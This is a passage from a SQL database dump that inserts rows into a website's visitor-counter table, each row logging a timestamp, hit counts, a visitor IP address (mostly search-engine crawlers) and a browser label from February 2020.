0,0,'66.249.64.26','chrome'),(481869,1581852690,1,1,0,0,'66.249.70.36','chrome'),(481870,1581852943,2,2,0,0,'66.249.70.33','chrome'),(481871,1581853014,1,1,0,0,'207.46.13.202','other'),(481872,1581853065,3,3,0,0,'66.249.64.27','chrome'),(481873,1581853228,1,1,0,0,'8.29.198.27','other'),(481874,1581853328,1,1,0,0,'109.74.154.72','chrome'),(481875,1581853778,2,2,0,0,'66.249.64.28','chrome'),(481876,1581853820,4,4,0,0,'66.249.64.26','chrome'),(481877,1581853821,2,2,0,0,'178.154.171.134','other'),(481878,1581853905,1,1,0,0,'66.249.70.33','chrome'),(481879,1581854131,1,1,0,0,'66.249.64.27','chrome'),(481880,1581854679,1,1,0,0,'66.249.70.62','chrome'),(481881,1581854880,2,2,0,0,'66.249.64.28','chrome'),(481882,1581854893,1,1,0,0,'66.249.64.26','chrome'),(481883,1581855111,1,1,0,0,'66.249.70.33','chrome'),(481884,1581855524,1,1,0,0,'66.249.64.27','chrome'),(481885,1581855876,2,1,1,0,'66.249.64.26',''),(481886,1581856101,1,1,0,0,'157.55.39.241','other'),(481887,1581856587,1,1,0,0,'66.249.70.36','chrome'),(481888,1581856805,1,1,0,0,'178.154.171.134','other'),(481889,1581856892,1,1,0,0,'178.154.171.127','other'),(481890,1581857653,1,0,1,0,'66.249.64.27',''),(481891,1581858501,1,1,0,0,'66.249.64.26','chrome'),(481892,1581859040,1,1,0,0,'66.249.70.62','chrome'),(481893,1581859042,2,2,0,0,'66.249.64.28','chrome'),(481894,1581859072,1,1,0,0,'141.8.183.73','other'),(481895,1581859126,2,2,0,0,'178.154.171.127','chrome'),(481896,1581859195,2,2,0,0,'66.249.64.27','chrome'),(481897,1581859337,1,1,0,0,'207.46.13.202','other'),(481898,1581859378,1,1,0,0,'178.154.171.127','other'),(481899,1581859896,1,1,0,0,'141.8.183.73','chrome'),(481900,1581859915,1,1,0,0,'8.29.198.25','other'),(481901,1581860469,1,1,0,0,'178.154.171.134','other'),(481902,1581860507,2,2,0,0,'66.249.64.28','chrome'),(481903,1581860579,1,1,0,0,'66.249.70.33','chrome'),(481904,1581860710,1,1,0,0,'207.46.13.202','other'),(481905,1581860812,1,1,0,0,'178.154.171.127','chrome'),(481906,1581861101,2,2,0,0,'66.249.64.26','chrome'),(481907,1581861887,1,1,0,0,'95.108.181.104','other'),(481908,1581861973,1,1,0,0,'178.154.171.127','chrome'),(481909,1581862302,1,1,0,0,'66.249.64.26','chrome'),(481910,1581862350,1,1,0,0,'66.249.64.27','chrome'),(481911,1581862381,1,1,0,0,'178.154.171.127','other'),(481912,1581862757,1,1,0,0,'141.8.188.39','chrome'),(481913,1581862918,2,2,0,0,'66.249.64.28','chrome'),(481914,1581863169,1,1,0,0,'207.46.13.202','other'),(481915,1581863256,1,0,1,0,'157.55.39.241',''),(481916,1581863615,2,2,0,0,'66.249.64.26','chrome'),(481917,1581863679,1,1,0,0,'66.249.64.27','chrome'),(481918,1581864181,1,1,0,0,'8.29.198.26','other'),(481919,1581864286,2,2,0,0,'178.154.171.134','other'),(481920,1581864313,1,1,0,0,'207.46.13.202','other'),(481921,1581864459,1,1,0,0,'178.154.171.127','other'),(481922,1581864533,5,5,0,0,'66.249.64.26','chrome'),(481923,1581864800,2,1,1,0,'66.249.64.28',''),(481924,1581864852,1,1,0,0,'66.249.70.62','chrome'),(481925,1581864984,2,2,0,0,'66.249.64.27','chrome'),(481926,1581865480,3,3,0,0,'66.249.64.28','chrome'),(481927,1581865951,1,1,0,0,'141.8.183.73','chrome'),(481928,1581866023,4,4,0,0,'66.249.64.26','chrome'),(481929,1581866267,1,1,0,0,'66.249.64.27','chrome'),(481930,1581866361,2,2,0,0,'178.154.171.134','other'),(481931,1581866437,2,2,0,0,'66.249.70.62','chrome'),(481932,1581866818,1,1,0,0,'178.154.171.127','chrome'),(481933,1581867056,1,1,0,0,'51.68.152.26','chrome'),(481934,1581867111,1,1,0,0,'141.8.142.2','chrome'),(481935,1581867207,1,1,0,0,'213.159.213.137','other'),(481936,1581867215,1,1,0,0,'66.249.64.27','chrome'),(481937,1581867283,2,2,0,0,'66.249.64.26','chrome'),(481938,1581867755,1,1,0,0,'66.249.64.28','chrome'),(481939,1581867898,1,1,0,0,'178.154.171.134','other'),(481940,1581868550,1,1,0,0,'207.46.13.202','other'),(481941,1581868947,1,1,0,0,'178.154.171.134','other'),(481942,1581869173,2,2,0,0,'66.249.64.28','chrome'),(481943,1581869493,1,1,0,0,'178.154.171.127','chrome'),(481944,1581869714,2,2,0,0,'109.87.170.60','firefox'),(481945,1581870252,1,1,0,0,'66.249.64.27','chrome'),(481946,1581870420,1,1,0,0,'13.66.139.0','other'),(481947,1581870446,1,1,0,0,'141.8.142.2','chrome'),(481948,1581870935,1,1,0,0,'8.29.198.26','other'),(481949,1581871181,1,1,0,0,'66.249.64.26','chrome'),(481950,1581871453,1,1,0,0,'157.55.39.241','other'),(481951,1581871492,4,4,0,0,'66.249.64.27','chrome'),(481952,1581871513,1,1,0,0,'46.211.48.18','other'),(481953,1581872037,1,1,0,0,'66.249.64.28','chrome'),(481954,1581872093,1,1,0,0,'66.249.64.26','chrome'),(481955,1581872221,1,1,0,0,'94.178.147.163','chrome'),(481956,1581872473,6,6,0,0,'66.249.64.27','chrome'),(481957,1581872581,1,1,0,0,'66.249.70.33','chrome'),(481958,1581873312,2,2,0,0,'66.249.70.62','chrome'),(481959,1581873396,3,3,0,0,'66.249.64.26','chrome'),(481960,1581873711,1,1,0,0,'207.46.13.202','other'),(481961,1581873808,2,2,0,0,'66.249.64.28','chrome'),(481962,1581874236,1,1,0,0,'157.55.39.241','other'),(481963,1581874767,2,2,0,0,'157.55.39.156','other'),(481964,1581875025,1,1,0,0,'66.249.64.28','chrome'),(481965,1581875105,1,1,0,0,'8.29.198.26','other'),(481966,1581875537,1,1,0,0,'178.154.171.134','other'),(481967,1581875594,1,1,0,0,'66.249.64.26','chrome'),(481968,1581875645,1,1,0,0,'199.59.247.110','firefox'),(481969,1581876149,1,1,0,0,'66.249.64.28','chrome'),(481970,1581876835,1,1,0,0,'66.249.70.62','chrome'),(481971,1581877041,1,1,0,0,'178.154.171.134','other'),(481972,1581877147,1,1,0,0,'173.252.111.19','other'),(481974,1581877148,1,1,0,0,'173.252.111.10','other'),(481977,1581877181,1,1,0,0,'207.46.13.202','other'),(481978,1581878010,1,1,0,0,'66.249.64.28','chrome'),(481979,1581878448,1,1,0,0,'207.46.13.202','other'),(481980,1581878876,1,1,0,0,'91.196.178.89','firefox'),(481981,1581879086,1,1,0,0,'66.249.70.33','chrome'),(481982,1581879214,1,1,0,0,'66.249.64.28','chrome'),(481983,1581879358,1,1,0,0,'31.13.127.24','other'),(481984,1581879359,1,1,0,0,'31.13.127.11','other'),(481986,1581879385,1,1,0,0,'157.55.39.156','other'),(481987,1581879789,1,1,0,0,'178.154.171.134','other'),(481988,1581880128,2,1,1,0,'66.249.64.28',''),(481989,1581880177,1,1,0,0,'66.249.64.26','chrome'),(481990,1581880423,2,2,0,0,'66.249.64.27','chrome'),(481991,1581881349,2,2,0,0,'66.249.64.26','chrome'),(481992,1581881418,1,1,0,0,'178.154.171.127','other'),(481993,1581881498,1,1,0,0,'157.55.39.241','other'),(481994,1581881571,1,1,0,0,'141.8.142.2','other'),(481995,1581881897,1,1,0,0,'8.29.198.25','other'),(481996,1581881966,2,2,0,0,'66.249.64.27','chrome'),(481997,1581882042,2,2,0,0,'178.154.171.134','other'),(481998,1581882181,1,1,0,0,'66.249.70.33','chrome'),(481999,1581882307,1,1,0,0,'66.249.64.28','chrome'),(482000,1581882579,1,1,0,0,'66.249.70.62','chrome'),(482001,1581882882,2,2,0,0,'157.55.39.241','other'),(482002,1581883072,1,1,0,0,'66.249.64.26','chrome'),(482003,1581883122,1,1,0,0,'165.22.24.71','other'),(482004,1581883457,3,3,0,0,'178.154.171.127','other'),(482005,1581883573,1,1,0,0,'173.252.111.20','other'),(482006,1581883574,1,1,0,0,'173.252.111.1','other'),(482007,1581884052,1,0,1,0,'66.249.64.26',''),(482008,1581884180,1,1,0,0,'66.249.70.62','chrome'),(482009,1581884183,1,1,0,0,'66.249.64.28','chrome'),(482010,1581884723,1,1,0,0,'66.249.64.26','chrome'),(482011,1581884850,1,1,0,0,'178.154.171.134','other'),(482012,1581885267,1,1,0,0,'207.46.13.202','other'),(482013,1581885575,1,1,0,0,'141.8.188.39','other'),(482014,1581885767,1,1,0,0,'141.8.183.111','other'),(482015,1581886017,1,1,0,0,'8.29.198.26','other'),(482016,1581886463,1,1,0,0,'66.249.64.28','chrome'),(482017,1581886949,2,2,0,0,'157.55.39.156','other'),(482018,1581887751,2,2,0,0,'66.249.64.27','chrome'),(482019,1581887754,3,3,0,0,'66.249.64.26','chrome'),(482020,1581887755,1,1,0,0,'66.249.70.33','chrome'),(482021,1581887900,1,1,0,0,'66.249.64.28','chrome'),(482022,1581887914,3,3,0,0,'66.249.70.36','chrome'),(482023,1581888195,1,1,0,0,'157.55.39.156','other'),(482024,1581888739,1,1,0,0,'66.249.64.26','chrome'),(482025,1581888743,1,1,0,0,'178.154.171.127','other'),(482026,1581888849,1,1,0,0,'95.108.181.104','other'),(482027,1581890410,1,1,0,0,'178.154.171.134','other'),(482028,1581890711,1,0,1,0,'66.249.64.26',''),(482029,1581891174,1,1,0,0,'157.55.39.156','other'),(482030,1581891203,2,2,0,0,'66.249.64.27','chrome'),(482031,1581891251,2,2,0,0,'5.255.253.8','other'),(482032,1581891347,1,1,0,0,'66.249.70.36','chrome'),(482033,1581891516,1,1,0,0,'66.249.70.33','chrome'),(482034,1581892510,1,1,0,0,'141.8.188.39','other'),(482035,1581892781,1,1,0,0,'157.55.39.156','other'),(482036,1581892842,1,1,0,0,'89.210.196.163','chrome'),(482037,1581892854,1,1,0,0,'8.29.198.25','other'),(482038,1581894071,1,1,0,0,'141.8.183.33','other'),(482039,1581894197,1,1,0,0,'37.9.113.10','other'),(482040,1581894351,1,1,0,0,'66.249.70.33','chrome'),(482041,1581894459,1,1,0,0,'141.8.188.25','other'),(482042,1581894531,1,1,0,0,'207.46.13.165','other'),(482043,1581894587,1,1,0,0,'141.8.188.66','other'),(482044,1581894608,1,1,0,0,'141.8.183.53','other'),(482045,1581894873,1,1,0,0,'66.249.64.27','chrome'),(482046,1581894960,5,5,0,0,'66.249.64.26','chrome'),(482047,1581895233,1,1,0,0,'141.8.188.39','other'),(482048,1581895483,1,1,0,0,'66.249.70.62','chrome'),(482049,1581895568,1,1,0,0,'157.55.39.156','other'),(482050,1581896348,10,10,0,0,'66.249.64.26','chrome'),(482051,1581896515,6,6,0,0,'66.249.64.27','chrome'),(482052,1581896672,3,3,0,0,'66.249.64.28','chrome'),(482053,1581897130,1,1,0,0,'8.29.198.27','other'),(482054,1581897510,2,2,0,0,'157.55.39.156','other'),(482055,1581897708,2,2,0,0,'66.249.64.26','chrome'),(482056,1581897902,1,1,0,0,'141.8.183.15','other'),(482057,1581897988,1,1,0,0,'66.249.64.27','chrome'),(482058,1581898026,2,2,0,0,'66.249.70.33','chrome'),(482059,1581899271,1,1,0,0,'66.249.64.27','chrome'),(482060,1581899511,1,1,0,0,'66.249.70.62','chrome'),(482061,1581900174,2,2,0,0,'141.8.132.9','other'),(482062,1581900294,1,0,1,0,'66.249.64.26',''),(482063,1581900912,1,1,0,0,'62.205.134.182','other'),(482064,1581901013,2,2,0,0,'66.249.64.27','chrome'),(482065,1581901474,1,1,0,0,'37.9.113.97','other'),(482066,1581901565,1,1,0,0,'66.249.64.26','chrome'),(482067,1581901903,2,2,0,0,'157.55.39.156','other'),(482068,1581902217,1,1,0,0,'141.8.132.12','other'),(482069,1581902882,4,4,0,0,'66.249.64.27','chrome'),(482070,1581903050,3,3,0,0,'66.249.64.26','chrome'),(482071,1581903053,1,1,0,0,'66.249.70.33','chrome'),(482072,1581903374,1,1,0,0,'141.8.142.177','other'),(482073,1581903809,1,1,0,0,'66.249.70.36','chrome'),(482074,1581903816,1,1,0,0,'8.29.198.25','other'),(482075,1581904094,2,2,0,0,'66.249.64.26','chrome'),(482076,1581904251,2,2,0,0,'66.249.64.28','chrome'),(482077,1581904729,4,4,0,0,'66.249.64.27','chrome'),(482078,1581904806,1,1,0,0,'66.249.70.36','chrome'),(482079,1581904814,1,1,0,0,'141.8.142.2','other'),(482080,1581905056,2,2,0,0,'66.249.64.26','chrome'),(482081,1581905907,1,1,0,0,'66.249.64.27','chrome'),(482082,1581906158,1,1,0,0,'178.154.171.66','other'),(482083,1581907028,3,1,2,0,'66.249.64.26',''),(482084,1581907159,2,2,0,0,'207.46.13.165','other'),(482085,1581907234,1,1,0,0,'66.249.64.27','chrome'),(482086,1581907542,1,1,0,0,'66.249.93.28','chrome'),(482087,1581907554,1,1,0,0,'207.46.13.118','other'),(482088,1581907712,2,2,0,0,'141.8.142.177','other'),(482089,1581908083,1,1,0,0,'8.29.198.25','other'),(482090,1581908623,1,1,0,0,'141.8.188.25','other'),(482091,1581910076,3,3,0,0,'66.249.64.27','chrome'),(482092,1581910143,1,1,0,0,'66.249.64.28','chrome'),(482093,1581910150,2,2,0,0,'66.249.70.62','chrome'),(482094,1581910187,1,1,0,0,'5.255.253.8','other'),(482095,1581910483,1,1,0,0,'141.8.132.31','other'),(482096,1581910813,2,2,0,0,'66.249.64.26','chrome'),(482097,1581911367,2,2,0,0,'66.249.64.28','chrome'),(482098,1581911916,1,1,0,0,'66.249.64.26','chrome'),(482099,1581912221,1,1,0,0,'66.249.64.27','chrome'),(482100,1581912339,1,1,0,0,'207.46.13.165','other'),(482101,1581912633,2,2,0,0,'66.249.64.28','chrome'),(482102,1581912952,1,1,0,0,'141.8.142.164','other'),(482103,1581913069,1,1,0,0,'178.154.171.134','other'),(482104,1581913269,1,1,0,0,'66.249.70.33','chrome'),(482105,1581913648,1,1,0,0,'207.46.13.165','other'),(482106,1581913662,1,1,0,0,'66.249.64.26','chrome'),(482107,1581914236,1,1,0,0,'207.46.13.118','other'),(482108,1581914717,2,2,0,0,'178.154.171.134','other'),(482109,1581914722,2,2,0,0,'178.154.171.127','other'),(482110,1581914767,1,1,0,0,'8.29.198.26','other'),(482111,1581914808,1,1,0,0,'66.249.64.26','chrome'),(482112,1581915488,1,1,0,0,'66.249.70.33','chrome'),(482113,1581916180,1,1,0,0,'66.249.70.36','chrome'),(482114,1581916631,1,1,0,0,'141.8.142.161','other'),(482115,1581916674,3,3,0,0,'66.249.64.27','chrome'),(482116,1581916916,1,1,0,0,'207.46.13.118','other'),(482117,1581917165,1,1,0,0,'178.154.171.127','other'),(482118,1581918035,1,1,0,0,'62.205.134.182','other'),(482119,1581918171,1,1,0,0,'178.154.171.134','other'),(482120,1581918301,1,1,0,0,'141.8.142.2','other'),(482121,1581918702,2,2,0,0,'66.249.64.27','chrome'),(482122,1581918773,1,1,0,0,'66.249.70.62','chrome'),(482123,1581918993,1,1,0,0,'8.29.198.25','other'),(482124,1581919099,2,2,0,0,'66.249.64.26','chrome'),(482125,1581919799,1,1,0,0,'207.46.13.165','other'),(482126,1581920070,1,1,0,0,'66.249.70.36','chrome'),(482127,1581920258,1,1,0,0,'91.196.178.90','chrome'),(482128,1581920786,1,1,0,0,'37.9.113.163','other'),(482129,1581920908,2,2,0,0,'66.249.64.26','chrome'),(482130,1581920944,1,1,0,0,'66.249.70.62','chrome'),(482131,1581921007,1,1,0,0,'207.46.13.165','other'),(482132,1581921134,1,1,0,0,'178.154.171.66','other'),(482133,1581921188,1,1,0,0,'91.196.178.76','chrome'),(482134,1581921523,1,1,0,0,'178.154.171.134','other'),(482135,1581921705,1,1,0,0,'141.8.188.25','other'),(482136,1581921818,3,3,0,0,'207.46.13.118','other'),(482137,1581922235,1,1,0,0,'178.154.171.127','other'),(482138,1581922384,1,1,0,0,'37.9.113.6','other'),(482139,1581922793,3,3,0,0,'66.249.64.27','chrome'),(482140,1581922805,1,1,0,0,'51.89.200.107','firefox'),(482141,1581922808,1,1,0,0,'66.249.64.28','chrome'),(482142,1581923057,1,1,0,0,'141.8.142.50','other'),(482143,1581923059,1,1,0,0,'193.24.221.34','firefox'),(482144,1581923273,1,1,0,0,'66.249.70.36','chrome'),(482145,1581923335,1,1,0,0,'91.196.178.42','chrome'),(482146,1581923477,1,1,0,0,'5.45.207.49','other');
INSERT INTO `fw3gt_zt_visitor_counter` VALUES (482147,1581923480,1,1,0,0,'37.9.113.10','other'),(482148,1581923704,1,1,0,0,'66.249.64.27','chrome'),(482149,1581923850,1,1,0,0,'207.46.13.118','other'),(482150,1581923969,1,1,0,0,'91.196.178.76','chrome'),(482151,1581924129,1,1,0,0,'193.24.221.34','firefox'),(482152,1581925311,1,0,1,0,'66.249.64.27',''),(482153,1581925317,1,1,0,0,'46.201.227.249','chrome'),(482154,1581925399,1,1,0,0,'178.154.171.66','other'),(482155,1581925646,1,1,0,0,'207.46.13.118','other'),(482156,1581925700,1,1,0,0,'8.29.198.27','other'),(482157,1581925849,1,1,0,0,'141.8.132.37','other'),(482158,1581926469,1,0,1,0,'66.249.64.27',''),(482159,1581926492,2,2,0,0,'66.249.64.26','chrome'),(482160,1581926829,1,1,0,0,'95.108.213.55','other'),(482161,1581926833,2,2,0,0,'91.196.178.76','chrome'),(482162,1581927091,1,1,0,0,'37.9.113.39','other'),(482163,1581927484,1,1,0,0,'141.8.132.12','other'),(482164,1581927777,1,1,0,0,'207.46.13.118','other'),(482165,1581927798,1,1,0,0,'207.46.13.149','other'),(482166,1581928512,1,1,0,0,'95.108.213.39','other'),(482167,1581929915,1,1,0,0,'8.29.198.25','other'),(482168,1581929939,1,1,0,0,'207.46.13.118','other'),(482169,1581930120,1,1,0,0,'66.249.64.27','chrome'),(482170,1581931181,3,3,0,0,'66.249.64.27','chrome'),(482171,1581931656,1,1,0,0,'141.8.142.128','other'),(482172,1581931712,2,2,0,0,'66.249.64.28','chrome'),(482173,1581931717,1,1,0,0,'66.249.70.62','chrome'),(482174,1581931791,1,1,0,0,'66.249.70.36','chrome'),(482175,1581931838,1,1,0,0,'66.249.64.26','chrome'),(482176,1581931952,1,1,0,0,'100.26.150.34','chrome'),(482177,1581932388,1,1,0,0,'66.249.70.33','chrome'),(482178,1581932614,2,2,0,0,'66.249.64.28','chrome'),(482179,1581932914,4,4,0,0,'66.249.64.26','chrome'),(482180,1581933147,3,3,0,0,'66.249.64.27','chrome'),(482181,1581933649,1,1,0,0,'37.9.113.177','other'),(482182,1581933695,1,1,0,0,'66.249.70.62','chrome'),(482183,1581933912,1,1,0,0,'141.8.188.38','other'),(482184,1581934084,4,4,0,0,'66.249.64.28','chrome'),(482185,1581934132,5,5,0,0,'66.249.64.27','chrome'),(482186,1581934188,3,3,0,0,'66.249.64.26','chrome'),(482187,1581934375,1,1,0,0,'66.249.70.33','chrome'),(482188,1581934804,1,1,0,0,'141.8.183.53','other'),(482189,1581934831,1,1,0,0,'173.252.111.15','other'),(482190,1581934832,1,1,0,0,'173.252.111.8','other'),(482192,1581935283,1,1,0,0,'91.196.178.7','chrome'),(482193,1581935505,4,4,0,0,'66.249.64.26','chrome'),(482194,1581935699,1,1,0,0,'91.196.178.76','chrome'),(482195,1581935705,3,3,0,0,'66.249.70.36','chrome'),(482196,1581935712,1,1,0,0,'91.196.178.74','chrome'),(482197,1581935731,1,1,0,0,'91.196.178.93','chrome'),(482198,1581935915,1,1,0,0,'207.46.13.149','other'),(482199,1581936138,2,2,0,0,'66.249.64.28','chrome'),(482200,1581936220,1,1,0,0,'66.249.70.33','chrome'),(482201,1581936275,1,1,0,0,'66.249.70.62','chrome'),(482202,1581936298,1,1,0,0,'207.46.13.118','other'),(482203,1581936407,7,7,0,0,'66.249.64.27','chrome'),(482204,1581936409,4,4,0,0,'66.249.64.26','chrome'),(482205,1581936630,1,1,0,0,'8.29.198.27','other'),(482206,1581936972,1,1,0,0,'91.196.177.46','chrome'),(482207,1581937105,1,1,0,0,'91.196.178.90','chrome'),(482208,1581937382,8,8,0,0,'66.249.64.26','chrome'),(482209,1581937383,1,1,0,0,'31.13.115.4','other'),(482210,1581937384,1,1,0,0,'31.13.115.5','other'),(482211,1581937395,8,8,0,0,'66.249.64.27','chrome'),(482212,1581937408,1,1,0,0,'31.13.115.12','other'),(482213,1581937409,1,1,0,0,'31.13.115.16','other'),(482215,1581937429,1,1,0,0,'5.45.207.49','other'),(482216,1581937494,1,1,0,0,'141.8.188.12','other'),(482217,1581937543,3,3,0,0,'66.249.64.28','chrome'),(482218,1581937752,1,1,0,0,'91.196.178.76','chrome'),(482219,1581938119,1,1,0,0,'92.112.124.239','chrome'),(482220,1581938349,2,2,0,0,'66.249.64.27','chrome'),(482221,1581938532,1,1,0,0,'141.8.183.18','other'),(482222,1581938869,1,1,0,0,'66.249.70.33','chrome'),(482223,1581938929,1,1,0,0,'66.249.64.26','chrome'),(482224,1581938999,1,1,0,0,'92.112.124.239','firefox'),(482225,1581939405,1,1,0,0,'109.74.154.72','chrome'),(482226,1581939492,1,1,0,0,'91.196.178.110','chrome'),(482227,1581939745,1,1,0,0,'130.180.210.175','chrome'),(482228,1581939771,1,1,0,0,'141.8.142.2','other'),(482229,1581939787,1,1,0,0,'66.249.70.33','chrome'),(482230,1581939807,4,4,0,0,'66.249.64.28','chrome'),(482231,1581939929,2,2,0,0,'66.249.64.27','chrome'),(482232,1581940167,1,1,0,0,'66.249.64.26','chrome'),(482233,1581940185,2,2,0,0,'207.46.13.118','other'),(482234,1581940186,1,1,0,0,'207.46.13.149','other'),(482235,1581940369,2,2,0,0,'66.249.70.36','chrome'),(482236,1581940823,1,1,0,0,'8.29.198.25','other'),(482237,1581941115,2,2,0,0,'5.45.207.65','other'),(482238,1581941141,1,1,0,0,'141.8.188.39','other'),(482239,1581941250,4,4,0,0,'66.249.64.27','chrome'),(482240,1581941376,2,2,0,0,'66.249.70.36','chrome'),(482241,1581941377,1,1,0,0,'78.111.188.2','chrome'),(482242,1581941412,1,1,0,0,'66.249.70.62','chrome'),(482243,1581941490,5,5,0,0,'66.249.64.28','chrome'),(482244,1581941521,6,6,0,0,'66.249.64.26','chrome'),(482245,1581941656,1,1,0,0,'37.9.113.200','other'),(482246,1581941972,1,1,0,0,'207.46.13.149','other'),(482247,1581942037,3,3,0,0,'66.249.70.33','chrome'),(482248,1581942051,1,1,0,0,'5.45.207.65','other'),(482249,1581942176,1,1,0,0,'37.9.113.97','other'),(482250,1581942187,1,1,0,0,'95.108.213.61','other'),(482251,1581942316,1,1,0,0,'66.249.69.37','chrome'),(482252,1581942481,1,1,0,0,'66.249.64.28','chrome'),(482253,1581942515,1,1,0,0,'78.111.188.2','chrome'),(482254,1581942622,2,2,0,0,'66.249.64.26','chrome'),(482255,1581942703,1,1,0,0,'91.196.178.76','chrome'),(482256,1581942823,1,1,0,0,'141.8.183.33','other'),(482257,1581943044,1,1,0,0,'141.8.188.66','other'),(482258,1581943067,2,2,0,0,'66.249.64.27','chrome'),(482259,1581943156,1,1,0,0,'91.196.178.119','chrome'),(482260,1581943932,1,1,0,0,'91.196.178.76','chrome'),(482261,1581943934,2,2,0,0,'66.249.64.26','chrome'),(482262,1581944119,1,1,0,0,'31.13.127.6','other'),(482263,1581944120,1,1,0,0,'31.13.127.1','other'),(482264,1581944609,5,5,0,0,'66.249.64.28','chrome'),(482265,1581944731,1,1,0,0,'141.8.188.66','other'),(482266,1581944734,1,1,0,0,'87.250.224.104','other'),(482267,1581944758,7,7,0,0,'66.249.64.27','chrome'),(482268,1581944835,1,1,0,0,'66.249.70.33','chrome'),(482269,1581944888,4,4,0,0,'66.249.64.26','chrome'),(482270,1581944892,1,1,0,0,'66.249.70.36','chrome'),(482271,1581944953,1,1,0,0,'91.196.177.46','chrome'),(482272,1581945144,2,2,0,0,'31.13.127.12','other'),(482273,1581945146,1,1,0,0,'31.13.127.13','other'),(482274,1581945147,1,1,0,0,'31.13.127.23','other'),(482275,1581945318,2,2,0,0,'207.46.13.118','other'),(482276,1581945490,1,1,0,0,'31.13.127.6','other'),(482277,1581945494,1,1,0,0,'31.13.115.29','other'),(482278,1581945586,1,1,0,0,'91.196.178.119','chrome'),(482279,1581945654,1,1,0,0,'91.196.176.13','chrome'),(482280,1581945669,1,1,0,0,'176.104.3.179','chrome'),(482281,1581945861,1,1,0,0,'46.133.169.80','chrome'),(482282,1581945932,2,2,0,0,'66.249.70.62','chrome'),(482283,1581946291,1,1,0,0,'66.249.70.33','chrome'),(482284,1581946318,1,1,0,0,'66.249.64.26','chrome'),(482285,1581946721,1,1,0,0,'91.196.178.76','chrome'),(482286,1581946885,1,1,0,0,'207.46.13.118','other'),(482287,1581947073,2,2,0,0,'66.249.70.62','chrome'),(482288,1581947144,1,1,0,0,'165.22.24.71','other'),(482289,1581947151,2,2,0,0,'66.249.64.28','chrome'),(482290,1581947156,1,1,0,0,'91.196.178.170','chrome'),(482291,1581947333,2,2,0,0,'91.196.177.46','chrome'),(482292,1581947395,1,1,0,0,'66.249.64.27','chrome'),(482293,1581947437,1,1,0,0,'46.211.141.12','chrome'),(482294,1581947466,1,1,0,0,'78.46.195.66','other'),(482295,1581947484,3,3,0,0,'66.249.64.26','chrome'),(482296,1581947536,1,1,0,0,'8.29.198.27','other'),(482297,1581947745,1,1,0,0,'37.9.113.177','other'),(482298,1581947961,2,2,0,0,'207.46.13.149','other'),(482299,1581948076,1,1,0,0,'91.196.178.72','chrome'),(482300,1581948258,1,1,0,0,'66.249.64.28','chrome'),(482301,1581948397,1,1,0,0,'66.102.9.191','chrome'),(482302,1581948619,1,1,0,0,'207.46.13.118','other'),(482303,1581948928,3,3,0,0,'66.249.64.27','chrome'),(482304,1581949043,1,1,0,0,'128.124.69.159','chrome'),(482305,1581949108,2,2,0,0,'78.111.187.13','chrome'),(482306,1581949182,1,1,0,0,'91.196.178.187','chrome'),(482307,1581949423,1,1,0,0,'66.249.70.33','chrome'),(482308,1581949446,3,3,0,0,'66.249.70.62','chrome'),(482309,1581949553,5,5,0,0,'66.249.64.28','chrome'),(482310,1581949650,12,12,0,0,'66.249.64.26','chrome'),(482311,1581949862,1,1,0,0,'157.55.39.102','other'),(482312,1581949879,2,2,0,0,'66.249.64.27','chrome'),(482313,1581950036,1,1,0,0,'66.249.70.36','chrome'),(482314,1581950077,1,1,0,0,'5.45.207.49','other'),(482315,1581950466,1,1,0,0,'37.9.113.39','other'),(482316,1581950781,2,2,0,0,'66.249.64.28','chrome'),(482317,1581950794,4,4,0,0,'66.249.64.26','chrome'),(482318,1581951072,1,1,0,0,'66.249.70.62','chrome'),(482319,1581951075,5,5,0,0,'66.249.64.27','chrome'),(482320,1581951148,2,2,0,0,'207.46.13.118','other'),(482321,1581951239,1,1,0,0,'141.8.142.128','other'),(482322,1581951736,1,1,0,0,'8.29.198.27','other'),(482323,1581951753,1,1,0,0,'82.144.206.66','chrome'),(482324,1581951955,1,1,0,0,'207.46.13.149','other'),(482325,1581952018,1,1,0,0,'5.45.207.65','other'),(482326,1581952106,4,4,0,0,'66.249.64.26','chrome'),(482327,1581952156,3,3,0,0,'66.249.64.28','chrome'),(482328,1581952839,3,3,0,0,'66.249.64.27','chrome'),(482329,1581953280,5,5,0,0,'66.249.64.26','chrome'),(482330,1581953398,1,1,0,0,'66.249.70.33','chrome'),(482331,1581953661,1,1,0,0,'66.249.64.28','chrome'),(482332,1581953752,3,3,0,0,'66.249.64.27','chrome'),(482333,1581954331,1,1,0,0,'207.46.13.149','other'),(482334,1581954654,3,3,0,0,'66.249.64.27','chrome'),(482335,1581955468,2,2,0,0,'157.55.39.102','other'),(482336,1581955558,1,1,0,0,'66.249.64.27','chrome'),(482337,1581955691,4,4,0,0,'66.249.64.28','chrome'),(482338,1581955780,1,1,0,0,'5.45.207.65','other'),(482339,1581956230,1,1,0,0,'66.249.64.26','chrome'),(482340,1581956426,3,3,0,0,'66.249.70.62','chrome'),(482341,1581956500,1,1,0,0,'92.113.174.112','chrome'),(482342,1581956600,2,2,0,0,'66.249.64.27','chrome'),(482343,1581956635,1,1,0,0,'207.46.13.149','other'),(482344,1581957308,2,2,0,0,'66.249.64.28','chrome'),(482345,1581957393,4,4,0,0,'66.249.64.26','chrome'),(482346,1581957593,1,1,0,0,'69.171.251.29','other'),(482347,1581957891,5,4,1,0,'66.249.64.27',''),(482348,1581957906,2,2,0,0,'66.249.70.62','chrome'),(482349,1581958378,3,3,0,0,'66.249.70.36','chrome'),(482350,1581958415,2,2,0,0,'66.249.70.33','chrome'),(482351,1581958547,2,0,2,0,'66.249.64.26',''),(482352,1581958684,1,1,0,0,'8.29.198.26','other'),(482353,1581958730,1,1,0,0,'207.46.13.149','other'),(482354,1581958879,1,1,0,0,'66.249.64.28','chrome'),(482355,1581958906,2,2,0,0,'66.249.64.27','chrome'),(482356,1581958917,2,2,0,0,'66.249.64.26','chrome'),(482357,1581959573,1,1,0,0,'91.196.178.139','chrome'),(482358,1581959901,5,5,0,0,'66.249.64.27','chrome'),(482359,1581960134,5,5,0,0,'66.249.64.26','chrome'),(482360,1581960196,1,1,0,0,'66.220.149.43','other'),(482361,1581960197,1,1,0,0,'66.220.149.35','other'),(482362,1581960205,1,1,0,0,'157.55.39.102','other'),(482363,1581960249,1,1,0,0,'178.95.245.21','chrome'),(482364,1581960292,1,1,0,0,'91.196.178.83','firefox'),(482365,1581960659,1,1,0,0,'66.249.70.36','chrome'),(482366,1581960717,1,1,0,0,'91.209.11.236','other'),(482367,1581961234,1,1,0,0,'66.249.64.27','chrome'),(482368,1581961363,1,1,0,0,'66.249.93.28','chrome'),(482369,1581961376,1,1,0,0,'37.9.113.33','other'),(482370,1581961458,1,1,0,0,'207.46.13.118','other'),(482371,1581962208,3,3,0,0,'66